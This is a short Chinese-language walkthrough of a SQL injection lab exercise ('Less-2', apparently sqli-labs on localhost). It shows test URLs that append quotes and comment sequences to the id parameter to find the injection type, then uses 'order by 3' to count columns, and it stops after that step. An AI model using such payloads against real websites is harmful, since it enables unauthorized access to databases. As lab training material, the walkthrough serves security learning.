传入id=1查看页面回显
http://localhost:55007/Less-2/?id=1
第一步:判断注入类型。如字符型,数值型
传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码
http://localhost:55007/Less-2/?id=1’ --+
http://localhost:55007/Less-2/?id=1" --+
http://localhost:55007/Less-2/?id=1%20–+
第二步:判断表字段数,使用order by
http://localhost:55007/Less-2/?id=1 order by 3–+
order by 3 时页面正常